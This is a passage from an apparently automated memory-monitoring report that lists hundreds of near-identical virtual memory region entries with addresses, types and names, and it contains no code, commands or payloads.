filename = "" Region: id = 8178 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8179 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8180 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8181 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8182 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8183 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8184 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8185 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8186 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8187 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8188 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8205 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8206 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8207 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8208 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8210 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8211 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8212 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8213 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8214 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8215 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8216 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8217 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8218 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8219 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8220 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8221 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8222 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8223 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8224 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8225 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8226 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8227 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8228 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8229 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8230 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8231 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8232 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8233 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8234 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8235 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8236 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8243 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8244 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8258 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8259 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8263 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8264 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8265 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8266 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8267 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8268 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8269 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8270 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8271 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8272 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8273 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8274 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8275 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8276 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8277 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8278 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8279 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8280 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8281 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8282 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8283 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8284 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8285 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8286 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8287 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8288 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8289 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8290 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8291 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8292 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8293 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8294 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8295 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8296 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8297 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8298 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8299 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8300 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8301 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 8302 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8306 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8307 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8308 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8309 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8310 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8311 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8312 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8313 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8314 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8315 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8316 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8317 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8318 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8319 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8320 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8321 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8322 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8323 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8324 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8325 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8326 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8327 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8332 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8333 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8334 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8336 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8337 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8338 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8350 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 8351 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 8352 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8353 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8354 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 8355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 8363 start_va = 0x610000 end_va = 0x61efff 